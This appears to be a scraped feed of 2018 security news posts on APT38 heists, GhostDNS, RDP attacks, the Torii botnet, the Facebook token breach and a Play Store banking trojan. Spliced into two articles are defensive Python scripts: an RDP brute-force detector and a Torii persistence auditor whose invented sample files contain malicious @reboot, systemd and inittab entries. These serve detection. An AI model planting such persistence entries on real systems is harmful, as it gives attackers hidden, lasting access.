Since at least 2014, APT38 has conducted operations in more than 16 organizations in at least 13 countries, sometimes simultaneously, indicating that the group is a large, prolific operation with extensive resources. The following are some details about APT38 targeting:

  • The total number of organizations targeted by APT38 may be even higher when considering the probable low incident reporting rate from affected organizations.
  • APT38 is characterized by long planning, extended periods of access to compromised victim environments preceding any attempts to steal money, fluency across mixed operating system environments, the use of custom developed tools, and a constant effort to thwart investigations capped with a willingness to completely destroy compromised machines afterwards.
  • The group is careful, calculated, and has demonstrated a desire to maintain access to a victim environment for as long as necessary to understand the network layout, required permissions, and system technologies to achieve its goals.
  • On average, we have observed APT38 remain within a victim network for approximately 155 days, with the longest time within a compromised environment believed to be almost two years.
  • In just the publicly reported heists alone, APT38 has attempted to steal over $1.1 billion dollars from financial institutions.

Investigating intrusions of many victimized organizations has provided us with a unique perspective into APT38’s entire attack lifecycle. Figure 1 contains a breakdown of observed malware families used by APT38 during the different stages of their operations. At a high-level, their targeting of financial organizations and subsequent heists have followed the same general pattern:

  1. Information Gathering: Conducted research into an organization’s personnel and targeted third party vendors with likely access to SWIFT transaction systems to understand the mechanics of SWIFT transactions on victim networks. (Please note: the systems in question are those used by the victim to conduct SWIFT transactions. At no point did we observe these actors breach the integrity of the SWIFT system itself.)
  2. Initial Compromise: Relied on watering holes and exploited an insecure out-of-date version of Apache Struts2 to execute code on a system.
  3. Internal Reconnaissance: Deployed malware to gather credentials, mapped the victim’s network topology, and used tools already present in the victim environment to scan systems.
  4. Pivot to Victim Servers Used for SWIFT Transactions: Installed reconnaissance malware and internal network monitoring tools on systems used for SWIFT to further understand how they are configured and being used. Deployed both active and passive backdoors on these systems to access segmented internal systems at a victim organization and avoid detection.
  5. Transfer funds: Deployed and executed malware to insert fraudulent SWIFT transactions and alter transaction history. Transferred funds via multiple transactions to accounts set up in other banks, usually located in separate countries to enable money laundering.
  6. Destroy Evidence: Securely deleted logs, as well as deployed and executed disk-wiping malware, to cover tracks and disrupt forensic analysis.


Figure 1: APT38 Attack Lifecycle

APT38 is unique in that it is not afraid to aggressively destroy evidence or victim networks as part of its operations. This attitude toward destruction is probably a result of the group trying to not only cover its tracks, but also to provide cover for money laundering operations.

In addition to cyber operations, public reporting has detailed recruitment and cooperation of individuals in-country to support with the tail end of APT38’s thefts, including persons responsible for laundering funds and interacting with recipient banks of stolen funds. This adds to the complexity and necessary coordination amongst multiple components supporting APT38 operations.

Despite recent efforts to curtail their activity, APT38 remains active and dangerous to financial institutions worldwide. By conservative estimates, this actor has stolen over a hundred million dollars, which would be a major return on the likely investment necessary to orchestrate these operations. Furthermore, given the sheer scale of the thefts they attempt, and their penchant for destroying targeted networks, APT38 should be considered a serious risk to the sector.

FCA fines Tesco Bank £16.4m over 2016 cyber attack

Tesco Bank agreed to pay £16.4m as part of a settlement with the Financial Conduct Authority following the 2016 security breach.

The Financial Conduct Authority (FCA) has imposed a £16.4m fine on Tesco Bank for the vulnerabilities in its systems that hackers exploited in 2016 to steal millions of pounds from customers’ online accounts.

In November 2016, Tesco Bank halted all online transactions after a cyber heist affected thousands of its customers. An investigation is ongoing.

The measure was announced by chief executive Benny Higgins; at the time, the bank admitted that 40,000 of its 136,000 current account customers had their accounts hacked, and that 50 percent of them had lost money.

According to the financial institution, hackers stole £2.26m from 9,000 customers’ accounts over a period of 48 hours. Most of the transactions were made in Brazil and relied on magnetic stripe rules.


The bank was fined because it was not able to demonstrate “due skill, care and diligence” in protecting customers’ accounts from cyber attacks.

“The fine the FCA imposed on Tesco Bank today reflects the fact that the FCA has no tolerance for banks that fail to protect customers from foreseeable risks,” said Mark Steward, the executive director of enforcement and market oversight at the FCA.

“In this case, the attack was the subject of a very specific warning that Tesco Bank did not properly address until after the attack started. This was too little, too late. Customers should not have been exposed to the risk at all. Banks must ensure that their financial crime systems and the individuals who design and operate them work to substantially reduce the risk of such attacks occurring in the first place.”

“The standard is one of resilience, reducing the risk of a successful cyber-attack occurring in the first place, not only reacting to an attack.”

Tesco Bank was alerted by Visa one year before the cyber attack, but failed to apply the necessary countermeasures.

According to the FCA, Tesco Bank breached Principle 2 because it failed to exercise due skill, care and diligence to:

  • Design and distribute its debit card.
  • Configure specific authentication and fraud detection rules.
  • Take appropriate action to prevent the foreseeable risk of fraud.
  • Respond to the November 2016 cyber attack with sufficient rigour, skill and urgency. 

According to the FCA, hackers used an algorithm to generate valid debit card numbers that were involved in fraudulent transactions.

Tesco Bank provided all the necessary support to the FCA and fully compensated customers; it was also able to halt a significant percentage of the unauthorized transactions.

The FCA praised the bank’s post-incident efforts to limit its customers’ exposure and granted it 30% credit for mitigation. Tesco Bank also agreed to an early settlement, which qualified it for a 30% (Stage 1) discount under the FCA’s executive settlement procedure.

“Tesco Bank provided a high level of cooperation to the FCA. Through a combination of this level of cooperation, its comprehensive redress programme which fully compensated customers, and in acknowledgment that it stopped a significant percentage of unauthorised transactions, the FCA granted the bank 30% credit for mitigation.” continues the FCA.

“In addition, Tesco Bank agreed to an early settlement of this matter which qualified for a 30% (Stage 1) discount under the FCA’s executive settlement procedure. But for the mitigation credit and the Stage 1 discount, the FCA would have imposed a penalty of £33,562,400.”

Pierluigi Paganini

(Security Affairs – Tesco cyber heist,  cybercrime)

The post FCA fines Tesco Bank £16.4m over 2016 cyber attack appeared first on Security Affairs.

Security Affairs: GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routers

Security experts from Qihoo 360 NetLab spotted GhostDNS, malware that has already infected over 100,000 devices and targets more than 70 different types of routers.

Security experts from Qihoo 360 NetLab have uncovered an ongoing hacking campaign that leverages the GhostDNS malware. Attackers have already hijacked over 100,000 home routers; the malicious code allows them to modify DNS settings to hijack traffic and redirect users to phishing websites.

Between September 21 and 27, the GhostDNS campaign compromised more than 100,000 routers, most of them (87.8%) located in Brazil.

GhostDNS is reminiscent of the infamous DNSChanger malware, which made headlines for its ability to change the DNS settings on infected devices.

GhostDNS scans for the IP addresses of routers that use weak or no passwords, accesses them, and changes their DNS settings to point to a rogue DNS server operated by the attackers.

“Just like the regular dnschanger, this campaign attempts to guess the password on the router’s web authentication page or bypass the authentication through the dnscfg.cgi exploit, then changes the router’s default DNS address to the Rogue DNS Server [3] through the corresponding DNS configuration interface.” reads the analysis published by the experts.

“But this campaign has more, we have found three related DNSChanger programs, which we call Shell DNSChanger, Js DNSChanger and PyPhp DNSChanger according to their programming languages.”


The GhostDNS has a modular structure composed of four components:

1) DNSChanger Module: the main module, designed to exploit targeted routers. It has three sub-modules, dubbed Shell DNSChanger, Js DNSChanger, and PyPhp DNSChanger:

  a) Shell DNSChanger is written in shell script and combines 25 shell scripts that allow the malware to carry out brute-force attacks on routers or firmware packages from 21 different manufacturers.
  b) Js DNSChanger is written in JavaScript and includes 10 attack scripts designed to infect 6 routers or firmware packages. It includes scanners, payload generators, and attack programs. The Js DNSChanger program is usually injected into phishing websites, so it works together with the Phishing Web System.
  c) PyPhp DNSChanger is written in Python and PHP and contains 69 attack scripts designed to target 47 different routers/firmware. The component has been found deployed on over 100 servers, most of them on Google Cloud, and includes functionality such as a Web API, a scanner and an attack module. Experts believe this sub-module is the core of DNSChanger, allowing attackers to scan the Internet for vulnerable routers.

2) Web Admin module: experts believe it implements an admin panel for the attackers, protected by a login page.

3) Rogue DNS module: resolves the targeted domain names to attacker-controlled web servers. At the time of the investigation the experts had no access to the Rogue DNS server, so it was not possible to know the exact number of DNS entries used to hijack legitimate domains.

4) Phishing Web module: implements phishing pages for the domains targeted in this campaign.

Attackers appear to be focused on Brazil, where they mainly targeted major banks.

“Currently the campaign mainly focuses on Brazil, we have counted 100k+ infected router IP addresses (87.8% located in Brazil), and 70+ router/firmware have been involved, and 50+ domain names such as some big banks in brazil, even Netflix, Citibank.br have been hijacked to steal the corresponding website login credentials,” continues the researchers.

Experts warn of the threat the GhostDNS malware poses to the Internet due to its scalability and the availability of multiple attack vectors.

Further details, including IoCs, are reported in the analysis published by Qihoo 360 NetLab.

Pierluigi Paganini

(Security Affairs – GhostDNS, IoT)

The post GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routers appeared first on Security Affairs.




BH Consulting marks EU Cyber Security Month with daily tips on staying secure

October is EU Cyber Security Month and to mark the occasion, BH Consulting will be sharing advice about digital security and privacy. Every working day during October, we’ll post useful information on our Twitter feed and on our LinkedIn page.

These short tips will draw attention to common security risks and threats that many of us face. We’ll be using various hashtags as appropriate, including #CyberSecMonth, #Cybersecuritymonth2018 #cyberaware, #cyberhygiene and #saferinternet4EU. (We also recommend you visit the official website for the EU-wide awareness campaign, at www.cybersecuritymonth.eu.)

Staying secure at work and in the home

The themes we plan to cover include staying secure in the workplace by preventing CEO fraud, ransomware, phishing and spam. As the month goes on, we’ll also give advice you can pass on to family members about protecting personal information and using digital technology securely.

Many of our posts will link to blogs we have written or to other open source security awareness material. At the end of each week, we’ll round up those tips into a post which we’ll publish here on our blog. This will be a ‘living’ post about EU Cyber Security Month that we’ll keep adding to as each week passes during October.

Please like and share widely to help us spread the word and improve security awareness for everyone. And a quick reminder: we also publish a monthly newsletter for information security professionals and people working in related roles. You can sign up for the newsletter

The post BH Consulting marks EU Cyber Security Month with daily tips on staying secure appeared first on BH Consulting.

Security Affairs newsletter Round 182 – News of the week

A new round of the weekly Security Affairs newsletter has arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web”, is online with a special deal: 20% discount on the Kindle Edition and the Paper Copy.

Once again, thank you!

·      Hackers target Port of Barcelona, maritime operations were not affected
·      New Virobot malware combines ransomware and botnet capabilities
·      A bug in Twitter Account Activity API exposed users’ messages to wrong developers
·      Critical flaw affects Cisco Video Surveillance Manager
·      Experts uncovered a new Adwind campaign aimed at Linux, Windows, and macOS systems
·      Firefox DoS issue crashes the browser and sometimes the Windows OS
·      Akamai Report: Credential stuffing attacks are a growing threat
·      Bitcoin Core Team fixes a critical DDoS flaw in wallet software
·      SHEIN Data breach affected 6.42 million users
·      White hat hacker found a macOS Mojave privacy bypass 0-day flaw on release day
·      Crooks leverage Kodi Media Player add-ons for malware distribution
·      Former NSA TAO hacker sentenced to 66 months in prison over Kaspersky Leak
·      Hide and Seek (HNS) IoT Botnet targets Android devices with ADB option enabled
·      0patch community released micro patches for Microsoft JET Database Zero-Day
·      Mutagen Astronomy Linux Kernel vulnerability affects Red Hat, CentOS, and Debian distros
·      Pangu hackers are back, they achieved the iOS 12 Jailbreak
·      Russian Sednit APT used the first UEFI rootkit ever in attacks in the wild
·      Talos experts published technical details for seven other VPNFilter modules
·      Uber agrees to pay $148 million in massive 2016 data breach settlement
·      CVE-2018-1718 – Google Project Zero reports a new Linux Kernel flaw
·      CVE-2018-17182 – Google Project Zero reports a new Linux Kernel flaw
·      Facebook hacked – 50 Million Users’ Data exposed in the security breach
·      Port of San Diego hit by a cyber attack a few days after the attack on the Port of Barcelona
·      QRecorder app in the Play Store was hiding a Banking Trojan that targets European banks
·      Facebook: User shadow data, including phone numbers, may be used by advertisers
·      Torii botnet, probably the most sophisticated IoT botnet ever
·      Trustwave expert found 2 credential leak issues in Windows PureVPN Client

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 182 – News of the week appeared first on Security Affairs.

FBI IC3 warns of cyber attacks exploiting Remote Desktop Protocol (RDP)

The FBI Internet Crime Complaint Center (IC3) warns of cyber attacks exploiting Remote Desktop Protocol (RDP) vulnerabilities.

Remote Desktop Protocol (RDP) is a widely adopted protocol for remote administration, but it could dramatically enlarge the attack surface if it isn’t properly managed.

The FBI Internet Crime Complaint Center (IC3) and the DHS issued a joint alert to highlight the rise of RDP as an attack vector.

Attackers are exploiting this feature to access systems to deploy malware such as the SamSam ransomware.

“Malicious cyber actors have developed methods of identifying and exploiting vulnerable RDP sessions over the Internet to compromise identities, steal login credentials, and ransom other sensitive information.” reads the alert issued by IC3.

“The Federal Bureau of Investigation (FBI) and Department of Homeland Security (DHS) recommend businesses and private citizens review and understand what remote accesses their networks allow and take steps to reduce the likelihood of compromise, which may include disabling RDP if it is not needed.”

Attackers can “infiltrate the connection” between the local and the remote machines and inject malware into the remote system. Experts warn that attacks using the Remote Desktop Protocol do not require user input, which makes intrusions difficult to detect.

The IC3 warns of the following vulnerabilities:

  • Weak passwords
  • Outdated versions of RDP may use a flawed CredSSP implementation that exposes them to man-in-the-middle attacks.
  • Allowing unrestricted access to the default Remote Desktop Protocol port (TCP 3389).
  • Allowing unlimited login attempts to a user account.


The alert recommends auditing the network for systems that use RDP for remote communication, limiting use of the Remote Desktop Protocol, keeping systems up to date, and implementing multi-factor authentication wherever possible.
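Two of the weaknesses the IC3 lists (unlimited login attempts and weak passwords) leave a visible trail in the Windows Security log. The following added example, which is not part of the IC3 alert, walks constructed log events (4625 failed logon, 4624 successful logon, logon type 10 = RemoteInteractive, i.e. RDP) and flags a guessing burst from one source address and any successful logon from that address shortly afterwards; the simplified `key=value` line format is an assumption of the example.

```python
"""Flag RDP password-guessing bursts in Windows Security events (added example).

Event 4625 is a failed logon, 4624 a successful one; logon type 10
(RemoteInteractive) is the type an RDP session produces.  Failures of other
types (e.g. 3, network) are ignored so SMB noise does not trigger RDP alerts.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample, not real telemetry: a guessing burst from 203.0.113.7
# that ends in a successful RDP logon, two stray failures from 198.51.100.9,
# and one network (type 3) failure that is not RDP and must be ignored.
SAMPLE_LOG = """\
2018-09-27T10:00:01 EventID=4625 LogonType=10 TargetUser=administrator SourceIP=203.0.113.7
2018-09-27T10:00:04 EventID=4625 LogonType=10 TargetUser=administrator SourceIP=203.0.113.7
2018-09-27T10:00:07 EventID=4625 LogonType=10 TargetUser=admin SourceIP=203.0.113.7
2018-09-27T10:00:09 EventID=4625 LogonType=3 TargetUser=backup SourceIP=192.0.2.5
2018-09-27T10:00:11 EventID=4625 LogonType=10 TargetUser=admin SourceIP=203.0.113.7
2018-09-27T10:00:15 EventID=4625 LogonType=10 TargetUser=jsmith SourceIP=198.51.100.9
2018-09-27T10:00:18 EventID=4625 LogonType=10 TargetUser=jsmith SourceIP=203.0.113.7
2018-09-27T10:00:22 EventID=4625 LogonType=10 TargetUser=jsmith SourceIP=203.0.113.7
2018-09-27T10:00:40 EventID=4625 LogonType=10 TargetUser=jsmith SourceIP=198.51.100.9
2018-09-27T10:03:05 EventID=4624 LogonType=10 TargetUser=jsmith SourceIP=203.0.113.7
"""

FAILED_LOGON, SUCCESSFUL_LOGON = "4625", "4624"
RDP_LOGON_TYPE = "10"


def parse_line(line):
    """Turn one 'timestamp key=value ...' line into a dict with a datetime."""
    stamp, *fields = line.split()
    event = {"ts": datetime.fromisoformat(stamp)}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event


def detect_rdp_abuse(log_text, threshold=5, window=timedelta(seconds=60),
                     follow_up=timedelta(minutes=10)):
    """Return alerts for RDP guessing bursts and for logons that follow them.

    A burst is `threshold` type-10 failures from one source within `window`.
    A successful type-10 logon from that source within `follow_up` of the
    burst is reported separately, since it suggests a guessed password.
    """
    alerts = []
    recent_failures = defaultdict(deque)   # source IP -> failure timestamps
    burst_seen_at = {}                     # source IP -> time of last burst alert
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        if ev.get("LogonType") != RDP_LOGON_TYPE:
            continue
        ip, ts = ev["SourceIP"], ev["ts"]
        if ev["EventID"] == FAILED_LOGON:
            q = recent_failures[ip]
            q.append(ts)
            while q and ts - q[0] > window:      # slide the window forward
                q.popleft()
            last = burst_seen_at.get(ip)
            if len(q) >= threshold and (last is None or ts - last > follow_up):
                burst_seen_at[ip] = ts           # one alert per burst, not per failure
                alerts.append({"type": "rdp_guessing_burst", "ip": ip,
                               "failures": len(q), "at": ts})
        elif ev["EventID"] == SUCCESSFUL_LOGON:
            last = burst_seen_at.get(ip)
            if last is not None and ts - last <= follow_up:
                alerts.append({"type": "logon_after_burst", "ip": ip,
                               "user": ev["TargetUser"], "at": ts})
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_abuse(SAMPLE_LOG):
        print(alert)
```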

Pierluigi Paganini

(Security Affairs – IC3, hacking)

The post FBI IC3 warns of cyber attacks exploiting Remote Desktop Protocol (RDP) appeared first on Security Affairs.

Security Affairs: Torii botnet, probably the most sophisticated IoT botnet of ever

Avast spotted a new IoT botnet, tracked as Torii, that appears much more sophisticated and stealthy than the numerous Mirai variants previously analyzed.

Security researchers spotted a new IoT botnet, tracked as Torii, that appears much more sophisticated and stealthy than the numerous Mirai variants previously analyzed.

According to experts from Avast, the Torii bot has been active since at least December 2017 and can target a broad range of architectures, including ARM, MIPS, x86, x64, PowerPC, and SuperH.

The Torii IoT botnet stands out for the large set of architectures it is able to target.

“Over the past week, we have been observing a new malware strain, which we call Torii, that differs from Mirai and other botnets we know of, particularly in the advanced techniques it uses.” reads the analysis published by Avast.

“Unlike the aforementioned IoT botnets, this one tries to be more stealthy and persistent once the device is compromised, and it does not (yet) do the usual stuff a botnet does like DDOS, attacking all the devices connected to the internet, or, of course, mining cryptocurrencies.”

According to the experts, the Torii botnet is being used to steal data from compromised IoT devices. The bot exfiltrates several pieces of information from each device, including its hostname and process ID.

The malicious code has a modular structure capable of fetching and executing further commands and executables, and it uses multiple layers of encrypted communication to avoid detection.

Another peculiarity of the Torii botnet is that it implements more than six ways to achieve persistence on infected devices.

“Afterwards, the dropper makes sure that the second stage payload is executed and that it will remain persistent. It is unique in that it is remarkably thorough in how it achieves persistence.” continues the analysis.

“It uses at least six methods to make sure the file remains on the device and always runs. And, not just one method is executed – it runs all of them.

    1. Automatic execution via injected code into ~/.bashrc
    2. Automatic execution via “@reboot” clause in crontab
    3. Automatic execution as a “System Daemon” service via systemd
    4. Automatic execution via /etc/init and PATH. Once again, it calls itself “System Daemon”
    5. Automatic execution via modification of the SELinux Policy Management
    6. Automatic execution via /etc/inittab”
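The persistence locations quoted above are also the places a defender should audit. The following added example (mine, not Avast's or the article's code) checks constructed copies of those files offline: the `System Daemon` label and the `@reboot` clause come from the article, while the sample paths, the `/tmp/.sd/sd` binary and the heuristic that boot-time jobs should not execute from scratch directories are my assumptions. The SELinux policy mechanism is not covered by this text-only check.

```python
"""Offline audit of the Linux persistence locations listed in the Torii
write-up: ~/.bashrc, crontab @reboot entries, systemd units, /etc/init
scripts and /etc/inittab. All artifacts below are CONSTRUCTED samples for a
hypothetical host, not real Torii files."""
import re
from typing import Dict, List, Tuple

# Heuristic (assumption): legitimate boot-time jobs rarely launch binaries
# from world-writable scratch directories.
SUSPECT_EXEC = re.compile(r"(?:^|[\s=;&|])((?:/tmp|/dev/shm|/var/tmp)/\S+)")
# The article notes the bot registers itself under this innocuous name.
SUSPECT_NAME = re.compile(r"system\s+daemon", re.IGNORECASE)

Finding = Tuple[str, str]  # (artifact path, offending line)


def _lines(text: str) -> List[str]:
    """Non-empty, non-comment lines, stripped."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]


def audit_bashrc(path: str, text: str) -> List[Finding]:
    """A shell RC file should configure the shell, not launch binaries from /tmp."""
    return [(path, ln) for ln in _lines(text) if SUSPECT_EXEC.search(ln)]


def audit_crontab(path: str, text: str) -> List[Finding]:
    """Torii uses the @reboot clause; report every such entry for review."""
    return [(path, ln) for ln in _lines(text) if ln.startswith("@reboot")]


def audit_systemd_unit(path: str, text: str) -> List[Finding]:
    """Flag units that call themselves 'System Daemon' or Exec* from a scratch dir."""
    out: List[Finding] = []
    for ln in _lines(text):
        key, _, val = ln.partition("=")
        key = key.strip()
        if key == "Description" and SUSPECT_NAME.search(val):
            out.append((path, ln))
        elif key.startswith("Exec") and SUSPECT_EXEC.search(val):
            out.append((path, ln))
    return out


def audit_init_script(path: str, text: str) -> List[Finding]:
    """/etc/init*-style scripts: apply both heuristics line by line."""
    return [(path, ln) for ln in _lines(text)
            if SUSPECT_NAME.search(ln) or SUSPECT_EXEC.search(ln)]


def audit_inittab(path: str, text: str) -> List[Finding]:
    """inittab entries are id:runlevels:action:process; inspect the process field."""
    out: List[Finding] = []
    for ln in _lines(text):
        fields = ln.split(":", 3)
        if len(fields) == 4 and SUSPECT_EXEC.search(fields[3]):
            out.append((path, ln))
    return out


def audit_host(artifacts: Dict[str, str]) -> List[Finding]:
    """Dispatch each collected artifact (path -> contents) to the matching checker."""
    findings: List[Finding] = []
    for path, text in artifacts.items():
        if path.endswith(".bashrc"):
            findings += audit_bashrc(path, text)
        elif "/cron" in path:
            findings += audit_crontab(path, text)
        elif path.endswith(".service"):
            findings += audit_systemd_unit(path, text)
        elif path == "/etc/inittab":
            findings += audit_inittab(path, text)
        elif path.startswith("/etc/init"):
            findings += audit_init_script(path, text)
    return findings


# CONSTRUCTED sample artifacts: standard paths, invented contents.
SAMPLE_ARTIFACTS: Dict[str, str] = {
    "/root/.bashrc": "alias ll='ls -la'\nexport PATH=$PATH:/usr/local/bin\n"
                     "/tmp/.sd/sd >/dev/null 2>&1 &\n",
    "/var/spool/cron/crontabs/root": "0 3 * * * /usr/bin/logrotate /etc/logrotate.conf\n"
                                     "@reboot /tmp/.sd/sd\n",
    "/etc/systemd/system/sd.service": "[Unit]\nDescription=System Daemon\n[Service]\n"
                                      "ExecStart=/tmp/.sd/sd\n[Install]\nWantedBy=multi-user.target\n",
    "/etc/init/sd.conf": "description \"System Daemon\"\nexec /tmp/.sd/sd\n",
    "/etc/inittab": "id:3:initdefault:\nsd:2345:respawn:/tmp/.sd/sd\n",
    "/etc/systemd/system/sshd.service": "[Unit]\nDescription=OpenSSH server daemon\n"
                                        "[Service]\nExecStart=/usr/sbin/sshd -D\n",
}

if __name__ == "__main__":
    for path, line in audit_host(SAMPLE_ARTIFACTS):
        print(f"{path}: {line}")
```

On a live host the same checkers can be fed the real file contents; the sshd unit in the sample shows that a benign service produces no finding.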

Torii infects devices that expose Telnet protected by weak credentials; it first executes a sophisticated script that determines the architecture of the target.

The script then downloads the first-stage payload that acts as a dropper for the second-stage payload.

Experts said that the bot component communicates with the CnC by active polling in an endless loop, waiting for commands to execute. Once a command has been executed, the bot replies with the results of its execution.

The samples analyzed by the experts were communicating with a command-and-control server located in Arizona.

At the time of the analysis, Telnet was the only vector used by the bot to compromise other devices.

According to BleepingComputer, the malicious code was also analyzed by the Italian cyber security expert Marco Ramilli, who noticed similarities to Persirai.

“Even though our investigation is continuing, it is clear that Torii is an example of the evolution of IoT malware, and that its sophistication is a level above anything we have seen before.” concludes the analysis.

“Once it infects a device, not only does it send quite a lot of information about the machine it resides on to the CnC, but by communicating with the CnC, it allows Torii authors to execute any code or deliver any payload to the infected device. This suggests that Torii could become a modular platform for future use.”

Further details, including IoCs, are reported in the analysis published by Avast.

Pierluigi Paganini

(Security Affairs – Torii IoT botnet, hacking)

The post Torii botnet, probably the most sophisticated IoT botnet ever appeared first on Security Affairs.



Facebook hacked – 50 Million Users’ Data exposed in the security breach

Facebook hacked – Attackers exploited a vulnerability in the “View As” feature that allowed them to steal Facebook access tokens of 50 Million Users.

Facebook hacked: this is the news rapidly spreading across the Internet. A few hours ago, Facebook announced that an attack on its computer network exposed the personal information of roughly 50 million users.

The social network giant discovered the security breach this week; the attackers exploited a bug in the “View As” feature to steal users’ access tokens and take over their accounts.

Facebook identified and fixed the flaw exploited in the attack; it immediately launched an investigation and reported the incident to law enforcement.

In a blog post, Facebook’s Guy Rosen, VP of Product Management explained that the attackers exploited a vulnerability associated with Facebook’s “View As” feature that allowed them to steal Facebook access tokens. These tokens could then be used to take over people’s accounts.

“On the afternoon of Tuesday, September 25, our engineering team discovered a security issue affecting almost 50 million accounts.” stated Guy Rosen, Facebook VP of Product Management.

“Our investigation is still in its early stages. But it’s clear that attackers exploited a vulnerability in Facebook’s code that impacted “View As”, a feature that lets people see what their own profile looks like to someone else. This allowed them to steal Facebook access tokens which they could then use to take over people’s accounts.”

Facebook disabled the “View As” feature in response to the incident, reset the security tokens for the 50 million impacted accounts and, as a precautionary measure, reset them for another 40 million accounts.

“Second, we have reset the access tokens of the almost 50 million accounts we know were affected to protect their security. We’re also taking the precautionary step of resetting access tokens for another 40 million accounts that have been subject to a “View As” look-up in the last year. As a result, around 90 million people will now have to log back in to Facebook, or any of their apps that use Facebook Login. After they have logged back in, people will get a notification at the top of their News Feed explaining what happened.” continues Guy Rosen.

“Third, we’re temporarily turning off the “View As” feature while we conduct a thorough security review.”

Facebook revealed that the bug exploited by the attackers was introduced with a change to their video uploading feature made in July 2017.

The tech giant said it did not know the source of the attack or identity of the attackers.

“We’re taking it really seriously,” Mark Zuckerberg, the company’s chief executive, said in a conference call with reporters. “We have a major security effort at the company that hardens all of our surfaces.” He added: “I’m glad we found this. But it definitely is an issue that this happened in the first place.”

The company will provide more information once the investigation is completed.

Pierluigi Paganini

(Security Affairs – Facebook hacked, data breach)

The post Facebook hacked – 50 Million Users’ Data exposed in the security breach appeared first on Security Affairs.

QRecorder app in the Play Store was hiding a Banking Trojan that targets European banks

The QRecorder app in the Play Store impersonating a phone call and voice recording utility embedded a banking malware used to target European banks.

Security experts from ESET have discovered a malicious app in the official Google Play Store that impersonates a phone call and voice recording utility and that was hiding banking malware used to target customers of European banks.

The malware, tracked as Razdel, is a variant of BankBot mobile banking Trojan.

According to Czech Television, the malicious code targets apps from Raiffeisen Bank, as well as ČSOB and Česká Spořitelna.

Czech Police shared an identikit and pictures from an ATM security camera of a money mule withdrawing money from a Prague ATM using the affected victims’ accounts.

The malware was hidden in the QRecorder app and, according to ESET security researcher Lukas Stefanko, the banking Trojan was downloaded and installed by over 10,000 users.

The malicious QRecorder app is able to intercept SMS two-factor authentication (2FA) messages and ask for permission to display overlays on top of legitimate bank apps to control what the user sees on his device.

To avoid raising suspicions, the malicious application correctly implements the audio recording features.

Stefanko discovered that the threat actor behind the operation sends commands to the app within 24 hours of installation; for example, it scans the device for specific banking apps.

The attacker leverages Google Firebase messages to communicate with compromised devices. If one of the targeted apps is installed on the device, the malware asks the user to activate the Accessibility service before downloading the payload, and uses that permission to automatically download and execute the malicious payload.

Once the malicious payload is downloaded, it sets triggers for legitimate banking apps. If one of the targeted apps is launched by the user, the malware displays an overlay to steal credentials.

“Before downloading payload it would request user to activate Accessibility service and using this permission it would automatically download, install and open malicious payload.” wrote Stefanko.

“Once payload is downloaded it sets triggers for legitimate banking apps. If one of the targeted apps is launched it would create similar like looking activity that overlays official app demanding credentials.”

According to an official statement from the Czech police, QRecorder infected five victims in the Czech Republic, stealing a total of over 78,000 Euros from their accounts.

The analysis of the code revealed that the QRecorder malware is able to monitor a large number of banks, including Air Bank, Equa, ING, Bawag, Fio, Oberbank, and Bank Austria.

One of the most interesting aspects of this malware is that the threat actor created different payloads for each targeted bank.

The QRecorder app has been removed from the official Android store; the video below shows how the app operates.

Pierluigi Paganini

(Security Affairs – QRecorder app, malware)

The post QRecorder app in the Play Store was hiding a Banking Trojan that targets European banks appeared first on Security Affairs.

Cybersecurity Research Shows Risks Continue to Rise

Research is at the center of the cybersecurity industry, with a steady stream of reports that highlight weaknesses in cyber defenses and potential solutions. Last week was a particularly busy

The post Cybersecurity Research Shows Risks Continue to Rise appeared first on The Cyber Security Place.

Security Affairs: Port of San Diego hit by a cyber attack a few days after the attack on the Port of Barcelona

Port of San Diego suffered a ransomware-based attack, a few days after the Port of Barcelona was hit by a cyber attack that caused several problems.

A few days ago the Port of Barcelona was hit by a cyber attack that caused several problems for the critical infrastructure; now another major international port has been targeted by attackers.

The second attack was reported on September 25 and hit the Port of San Diego, in the United States.

Several computers at the Port of San Diego were infected with ransomware; the incident impacted the processing of park permits and record requests, along with other operations.

According to officials, ordinary operations, including ship access and public safety, have not been affected by the cyber attack.

“The Port of San Diego has experienced a serious cybersecurity incident that has disrupted the agency’s information technology systems. The Port first received reports of the disruption on Tuesday, September 25, 2018. The Port has mobilized a team of industry experts and local, regional, state and federal partners to minimize impacts and restore system functionality, with priority placed on public safety-related systems. The Harbor Police Department has alternative systems and procedures in place to minimize impacts to public safety.” said Randa Coniglio, Chief Executive Officer for the Port of San Diego, in a statement published on the site of the port the day after the attack.

“Additionally, we have reported this disruption to the California Office of Emergency Services (Cal OES) and the County of San Diego Office of Emergency Services. Port employees are currently at work but have limited functionality, which may have temporary impacts on service to the public, especially in the areas of park permits, public records requests, and business services. No further information is available at this time; updates will be provided as information is available,” said Port of San Diego CEO Randa Coniglio.

The port authority promptly reported the incident to the California Office of Emergency Services and the County of San Diego Office of Emergency Services. Federal authorities and the Department of Homeland Security launched an investigation into the attack.

In July, the China Ocean Shipping Co. (COSCO) terminal at the Port of Long Beach was hit by a cyber attack; according to COSCO, a “local network breakdown” disrupted some of its systems in the United States.

Clearly, the series of “disruptive” cyber attacks reported by three ports raises questions about the level of security of this kind of infrastructure.

Port authorities are privileged targets for hackers, and they are often easy to attack.

The fear is that a threat actor is focusing his efforts against ports worldwide.

Pierluigi Paganini

(Security Affairs – Port of San Diego, hacking)

The post Port of San Diego hit by a cyber attack a few days after the attack on the Port of Barcelona appeared first on Security Affairs.



Fancy Bear’s VPNfilter malware is back with 7 new modules

By Waqas

Cisco’s Talos researchers have identified that Russia’s VPNfilter is way more dangerous than it was believed to be. The malware, which prompted the FBI to urge people to reboot their internet routers, contains seven additional third-stage modules that have been infecting countless networking devices worldwide since 2016. The infected devices are mainly located in Ukraine as […]

This is a post from HackRead.com Read the original post: Fancy Bear’s VPNfilter malware is back with 7 new modules

Former NSA TAO hacker sentenced to 66 months in prison over Kaspersky Leak

Former NSA TAO hacker was sentenced to 66 months in prison because he leaked top-secret online documents related to the US government ban on Kaspersky.

A former member of the NSA’s Tailored Access Operations hacking team was sentenced to 66 months in prison because he leaked top-secret online documents related to the US government ban on Kaspersky software.

